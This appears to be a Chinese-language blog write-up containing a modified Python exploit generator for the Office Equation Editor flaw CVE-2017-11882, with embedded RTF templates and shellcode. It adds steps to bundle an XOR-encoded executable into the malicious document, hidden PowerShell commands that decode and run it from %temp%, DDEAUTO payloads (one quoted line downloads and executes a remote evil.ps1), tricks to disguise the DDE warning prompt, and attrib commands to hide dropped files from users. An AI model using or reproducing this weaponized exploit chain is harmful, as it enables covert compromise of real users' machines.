480C3A000A0000006161616161616161616108000000320A080ABA340100000061610C000000320A080A3A2D0A000000616161616161616161610C000000320A080ABA250A000000616161616161616161610C000000320A080A3A1E0A000000616161616161616161610C000000320A080ABA160A000000616161616161616161610C000000320A080A3A0F0A000000616161616161616161610C000000320A080ABA070A000000616161616161616161610C000000320A080A3A000A0000006161616161616161616108000000320AC807BA340100000061000C000000320AC8073A2D0A000000616161616161616161610C000000320AC807BA250A000000616161616161616161610C000000320AC8073A1E0A000000616161616161616161610C000000320AC807BA160A000000616161616161616161610C000000320AC8073A0F0A000000616161616161616161610C000000320AC807BA070A000000616161616161616161610C000000320AC8073A000A0000006161616161616161616108000000320A8805BA340100000061000C000000320A88053A2D0A000000616161616161616161610C000000320A8805BA250A000000616161616161616161610C000000320A88053A1E0A000000616161616161616161610C000000320A8805BA160A000000616161616161616161610C000000320A88053A0F0A000000616161616161616161610C000000320A8805BA070A000000616161616161616161610C000000320A88053A000A0000006161616161616161616108000000320A4803BA340100000061000C000000320A48033A2D0A000000616161616161616161610C000000320A4803BA250A000000616161616161616161610C000000320A48033A1E0A000000616161616161616161610C000000320A4803BA160A000000616161616161616161610C000000320A48033A0F0A000000616161616161616161610C000000320A4803BA070A000000616161616161616161610C000000320A48033A000A0000006161616161616161616108000000320A0801BA340100000061610C000000320A08013A2D0A000000616161616161616161610C000000320A0801BA250A000000616161616161616161610C000000320A08013A1E0A000000616161616161616161610C000000320A0801BA160A000000616161616161616161610C000000320A08013A0F0A000000616161616161616161610C000000320A0801BA070A000000616161616161616161610C000000320A08013A000A000000616161616161616161610A00000026060F000A00FFFFFFFF0100000000001C000000FB021000070000000000BC02000000860102022253797374656D000021008A0200000A00CD1166F121008A02FFFFFFFF78EF1900040000002D01010004000000F0010000030000000000
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
\par}
'''

head605 = r'''{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF0900060000000000000000000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C00000000000004600000000000000000000000070F7DECF0064D30103000000C00300000000000001004F006C00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000001400000000000000010043006F006D0070004F0062006A00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000001000000660000000000000003004F0062006A0049006E0066006F0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000012000201FFFFFFFF04000000FFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000030000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000020800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02CE020000000000C000000000000046170000004D6963726F736F6674204571756174696F6E20332E30000C0000004453204571756174696F6E000B0000004571756174696F6E2E3300F439B271000000000000000000000000000000000000000000000000000000000000000000000000000000000300010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
'''

stuff605 = '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000004000000B5020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'

tail605 = r'''
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
\par}
'''
# 0:  b8 44 eb 71 12          mov    eax,0x1271eb44
# 5:  ba 78 56 34 12          mov    edx,0x12345678
# a:  31 d0                   xor    eax,edx
# c:  8b 08                   mov    ecx,DWORD PTR [eax]
# e:  8b 09                   mov    ecx,DWORD PTR [ecx]
# 10: 8b 09                   mov    ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c             add    cx,0x3c
# 16: 31 db                   xor    ebx,ebx
# 18: 53                      push   ebx
# 19: 51                      push   ecx
# 1a: be 64 3e 72 12          mov    esi,0x12723e64
# 1f: 31 d6                   xor    esi,edx
# 21: ff 16                   call   DWORD PTR [esi] // call WinExec
# 23: 53                      push   ebx
# 24: 66 83 ee 4c             sub    si,0x4c
# 28: ff 10                   call   DWORD PTR [eax] // call ExitProcess
stagecmd = "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"

# pads with nop
stagecmd = stagecmd.ljust(44, '\x90')

# 0:  b8 44 eb 71 12          mov    eax,0x1271eb44
# 5:  ba 78 56 34 12          mov    edx,0x12345678
# a:  31 d0                   xor    eax,edx
# c:  8b 08                   mov    ecx,DWORD PTR [eax]
# e:  8b 09                   mov    ecx,DWORD PTR [ecx]
# 10: 8b 09                   mov    ecx,DWORD PTR [ecx]
# 12: 66 83 c1 3c             add    cx,0x3c
# 16: ff e1                   jmp    ecx
stagesc = "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\xFF\xE1"

# pads with nop
stagesc = stagesc.ljust(44, '\x90')

# This is shellcode to inject into another EQNEDT32.EXE and execute it
# source at shellcode.c
stageinject = 'U\x8b\xec\x83\xe4\xf8\x81\xec\xc4\x03\x00\x00\xb9U\x95\xdbmSVW\xe8\xc8\x02\x00\x00\x8b\xf8\x85\xffu\x18\xb9u\xee@p\xe8\xb8\x02\x00\x00\x8b\xf8\x85\xffu\x083\xc0@\xe9\xa3\x02\x00\x00\xba\x9e3i\xb7\x8b\xcf\xe8\xfb\x02\x00\x00\x8b\xf0\x85\xf6t\xe6\xba*\x92\x12\xd8\xe8\xeb\x02\x00\x003\xdb\x89D$ \x85\xc0u\x03S\xff\xd6\xba\xc8\xe8"o\x8b\xcf\xe8\xd2\x02\x00\x00\x89D$8\x85\xc0u\x03S\xff\xd6\xba\xc2\xcf\xa2\xeb\x8b\xcf\xe8\xbb\x02\x00\x00\x89D$D\x85\xc0u\x03S\xff\xd6\xba\xaa?z\xbe\x8b\xcf\xe8\xa4\x02\x00\x00\x89D$4\x85\xc0u\x03S\xff\xd6\xba\xf3\xf4\xf8\x97\x8b\xcf\xe8\x8d\x02\x00\x00\x89D$$\x85\xc0u\x03S\xff\xd6\xbaN\x96 ~\x8b\xcf\xe8v\x02\x00\x00\x89D$0\x85\xc0u\x03S\xff\xd6\xba\x19.\xb5\xae\x8b\xcf\xe8_\x02\x00\x00\x8b\xd8\x85\xdbu\x03P\xff\xd6\xbaZj\x0c\xbb\x8b\xcf\xe8J\x02\x00\x00\x89D$@\x85\xc0u\x03P\xff\xd6\xba\x8d\xbfw\x82\x8b\xcf\xe83\x02\x00\x00\x89D$<\x85\xc0u\x03P\xff\xd6jDY\x8dD$X3\xd2\x88\x10@Iu\xfaj\x10Y\x8dD$H\x88\x10@Iu\xfa3\xc0\xc7D$XD\x00\x00\x00f\x89\x84$\x88\x00\x00\x00\x8dD$HP\x8dD$\\\xc7\x84$\x88\x00\x00\x00\x01\x00\x00\x00PRRj\x02RRR\x8dD$0\xc7D$0EQNEPR\xc7D$<DT32\xc7D$@.EXE\x88T$D\xff\xd3\x85\xc0u\x04j\xff\xff\xd6j`Y\x8d\x84$\xa0\x00\x00\x00\xc6\x00\x00@Iu\xf9\x83\xbc$\xa0\x00\x00\x00\x03tA\x8b|$4\x8b\\$$h\x88\x13\x00\x00\x8d\x84$\xa4\x00\x00\x00P\xff\xd7\x85\xc0u\x03P\xff\xd6\x83\xbc$\xa0\x00\x00\x00\x03t\x19h\x02\x00\x01\x00\xfft$X\xfft$X\xff\xd3\x83\xbc$\xa0\x00\x00\x00\x03u\xc7\x8b\x9c$\xb0\x00\x00\x00\x8d\x84$\x00\x01\x00\x00\x8b\xbc$\xb4\x00\x00\x00\xb9\xcc\x02\x00\x00\xc6\x00\x00@Iu\xf9\x8d\x84$\x00\x01\x00\x00\xc7\x84$\x00\x01\x00\x00\x01\x00\x01\x00PW\xffT$L\x85\xc0u\x03P\xff\xd6\x8dD$,Pj@h\x00P\x00\x00h\x00\x10@\x00S\xffT$4\x85\xc0u\x03P\xff\xd6\x83d$,\x00\xe8k\x01\x00\x00\x83d$(\x00\x8dH\x01\x89L$ \x8bD$ \x8b\x00\x89D$(\x8dD$,\x83\xc1\x04P\xfft$,Qh\x00\x10@\x00S\xffT$L3\xdb\x85\xc0u\x03S\xff\xd6\x8d\x84$\x00\x01\x00\x00\xc7\x84$\xb8\x01\x00\x00\x00\x10@\x00PW\xffT$8\x85\xc0u\x03S\xff\xd6S\xffT$D\x85\xc0u\x03S\xff\xd6h\x02\x00\x01\x00\xfft$X\xfft$X\xffT$0\x85\xc0u\x03S\xff\xd6\xfft$P\xffT$@\x85\xc0u\x03S\xff\xd6S\xff\xd6_^[\x8b\xe5]\xc3U\x8b\xecQSVW\x8b\xd9d\xa10\x00\x00\x00\x8b@\x0c\x8bp\x0c\x8bV0\x8b\xc2\x89E\xfc\x85\xd2t%\x0f\xb7\x02\xb9\x05\x15\x00\x003\xff\xeb\rk\xc9!\x0f\xb7\xc0\x03\xc8G\x0f\xb7\x04zf\x85\xc0u\xee;\xcbt\x15\x8bE\xfc\x8b6\x8bV0;\xd0u\xce3\xc0_^[\x8b\xe5]\xc3\x8bF\x18\xeb\xf4U\x8b\xec\x83\xec\x10\x8bA<\x89U\xfc\x8bD\x08x\x85\xc0tV\x8bT\x08\x1cS\x8b\\\x08$\x03\xd1V\x8bt\x08 \x03\xd9\x8bD\x08\x18\x03\xf1\x89U\xf03\xd2\x89u\xf4\x89E\xf8W\x85\xc0t)\x8b4\x96\xbf\x05\x15\x00\x00\x03\xf1\xeb\tk\xff!\x0f\xbe\xc0\x03\xf8F\x8a\x06\x84\xc0u\xf1;}\xfct\x12\x8bu\xf4B;U\xf8r\xd73\xc0_^[\x8b\xe5]\xc3\x0f\xb7\x04S\x8bU\xf0\x8b\x04\x82\x03\xc1\xeb\xeb\xeb\x04\x8b\x04$\xc3\xe8\xf7\xff\xff\xff\xc3'


def genrtf605(type, cmd):
    print "use genrtf605"

    payload = '\x1c\x00\x00\x00\x02\x00\xa8\xc3\x99\x02\x00\x00\x00\x00\x00\x00H\x90]\x00l\x9c[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
    if type:
        payload += stagecmd
    else:
        payload += stagesc

    payload += pack('<I', 0x00402114)  # ret
    payload += '\x00' * 2

    left = 0x100 - len(payload)
	
    # 自定义cmd命令
    cmd = """cmd /k "cd c:\\users\\a\desktop & echo 111 > 1.txt" """

    payload += cmd[:left]
    payload = payload.ljust(0x100, '\x00')

    return head605 + payload.encode('hex') + stuff605 + cmd[left:].ljust(437, '\x00').encode('hex') + tail605


def genrtf17k(type, cmd):
    print "use genrtf17k"

    payload = '\x1c\x00\x00\x00\x02\x00\xa8\xc3kF\x00\x00\x00\x00\x00\x00\xa0_s\x00d\x0cq\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ'
    if type:
        payload += stagecmd
    else:
        payload += stagesc

    payload += pack('<I', 0x00402114)  # ret
    payload += '\x00' * 2

    # cmd = """cmd /c powershell -WindowStyle hidden -Command "$rtfpath = Get-ChildItem *.doc | where-object {$_.length -eq 0x00037831} | Select-Object -ExpandProperty Name; $file = gc $rtfpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\\tmp' + (Get-Random) + '.exe';sc $path ([byte[]]($file | select -Skip 008241)) -Encoding Byte; &$path;" """
    payload += cmd

    payload = payload.ljust(18055, '\x00')

    return head17k.lower() + payload.encode('hex') + tail17k.lower()


def genrtf(type, cmd):
    if len(cmd) > 17967:
        if type:
            raise ValueError('Command must be shorter than 17967 bytes!')
        else:
            raise ValueError('Code must be shorter than 17967 bytes!')

    if len(cmd) > 605:
        return genrtf17k(type, cmd)
    else:
        return genrtf605(type, cmd)


if __name__ == '__main__':

    parser = argparse.ArgumentParser(prog='CVE-2017-11882.py',
                                     description="Exploit for CVE-2017-11882  @unamer(https://github.com/unamer/CVE-2017-11882)")
    parser.add_argument("-c", "--cmd",
                        help="Command or shellcode file to run in target system\n(Must be shorter than 17967 bytes!!)",
                        required=True)
    parser.add_argument("-t", "--type", help="Type (0:shellcode 1:command, default=1)", default=1, type=int,
                        choices=[0, 1],
                        required=False)
    parser.add_argument("-i", "--inject", help="Inject shellcode to new process", default=None, required=False)

    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)

    args = parser.parse_args()

    data = ''

    if args.type:
        data = args.cmd
    else:
        try:
            f = open(args.cmd, 'rb')
            data = f.read()
            f.close()

            if args.inject is not None:
                data = stageinject + pack('<I', len(data)) + data
        except:
            raise ValueError('Error in reading shellcode file!')
	
    # 设置异或值
    bXorEncryptValue = 0x77
    # 打开需要捆绑的文件,需要进行修改
    with open('./PEiD.exe', 'rb') as bind:
        dat = bind.read()
        bind.close()
        dat = bytearray(dat)
        for i in range(len(dat)):
            dat[i] = dat[i] ^ bXorEncryptValue
        dat = bytes(dat)

    with open(args.output, 'wb') as f:
        f.write(genrtf(args.type, data))
        f.write(dat)
        f.close()

    print 'Done.'

这里是直接硬编码文件名,可以执行但是我期望实现的是在不知道文件所在路径和文件名的情况下查找到文件

对应修改Poc代码107行(605字节版本)或者127行(17k版本)

1
cmd = """cmd /c powershell -WindowStyle hidden -Command "$rtfpath='c:\users\dell\desktop\11882.doc'; $file = gc $rtfpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\\tmp' + (Get-Random) + '.exe';sc $path ([byte[]]($file | select -Skip 008241)) -Encoding Byte; &$path;" """

借鉴lnk捆绑exe中通过文件大小查找文件的方式,失败

1
cmd = """cmd /c powershell -WindowStyle hidden -Command "$rtfpath = Get-ChildItem *.doc | where-object {$_.length -eq 0x00037831} | Select-Object -ExpandProperty Name; $file = gc $rtfpath -Encoding Byte; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 }; $path = '%temp%\\tmp' + (Get-Random) + '.exe';sc $path ([byte[]]($file | select -Skip 008241)) -Encoding Byte; &$path;" """

通过查看当前目录发现问题:执行路径不是自己期望的文件所在路径,而是默认路径C:\Windows\System32

1
python2 CVE-2017-11882.py -c 'cmd /c "cd > C:\\Users\DELL\Desktop\1.txt"' -o demo.doc

遍历文件夹

powershell获取文件完整路径

1
cmd /c "cd .. & cd .. & powershell -WindowStyle hidden -Command "$rtfpath = Get-ChildItem -filter *.doc -recurse | where-object {$_.length -eq 0x00037831} | %{$_.FullName};$file = gc $rtfpath -Encoding Byte;for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor 0x77 };$path = '%temp%\\tmp' + (Get-Random) + '.exe';sc $path ([byte[]]($file | select -Skip 008241)) -Encoding Byte; &$path;""

存在问题:遍历时间很长而且遍历到很多受保护的文件夹的时候会导致程序终止,稳定性很差

office DDE

参考:

Office DDE多种利用方式

Office DDE漏洞学习笔记

本来考虑使用宏病毒将doc文档释放到指定目录并隐藏,就可以通过硬编码文件路径的方式在任意位置释放并执行捆绑文件,但是发现rtf格式禁止使用宏。所以决定使用DDE注入命令(通过这种方式打开的cmd会默认在文档文件所在的目录)实现复制捆绑文件到指定目录并植入poc代码中的rtf部分

基础使用

1
2
# 进入文档文件: ctrl + F9,在显示的大括号中输入以下内容
DDEAUTO c:\\windows\\system32\\cmd.exe "/k copy 11882.doc C:\\Users\\DELL\\AppData\\Local\\Temp"

修改弹窗

参考的命令是这样的

1
DDEAUTO "C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden IEX (New-Object System.Net.WebClient).DownloadString('http://willgenovese.com/hax/evil.ps1'); # " "Microsoft Document Security Add-On"

但是用起来很多问题,所以自己研究了一下匹配规则重新写了一个:

  • 将构造好的cd命令放最前面,cd命令可自行更改,需要保证字符个数不变

  • 例如下面的示例:#Office总字符个数是28,如果你想把Office改成其他的显示,比Office长的就需要减少#,短的就增加#

  • 没太说明白,多尝试几次就明白我的意思了,后续命令用&连接即可

1
DDEAUTO C:\\Program_Files(x86)\\Microsoft_Office\\Office12\\Library\\..\\..\\..\\..\\windows\\system32\\cmd.exe "/c cd C:\\######################\\Office & copy 11882.doc C:\\Users\\Dell" "Microsoft Document Security Add On"

关于直接将DDE植入到rtf的二进制格式还没有实现

隐藏文件

将捆绑文件释放到指定目录并隐藏,即使设置了显示隐藏文件也无法看到通过这种方式隐藏的文件,除非设置显示受保护的系统隐藏文件 (文件夹->...->选项->查看->隐藏受保护的操作系统文件),但是会弹窗警告,说的还挺严重的,可以唬唬普通用户

1
2
3
4
5
6
7
8
9
# 隐藏
attrib 文件名(引号可省) +s +h
# 恢复
attrib 文件名(引号可省) -s -h

# 参数解释:
# attrib: 修改文件属性
# +s: 将文件设置为系统文件
# +h: 将文件设置为隐藏文件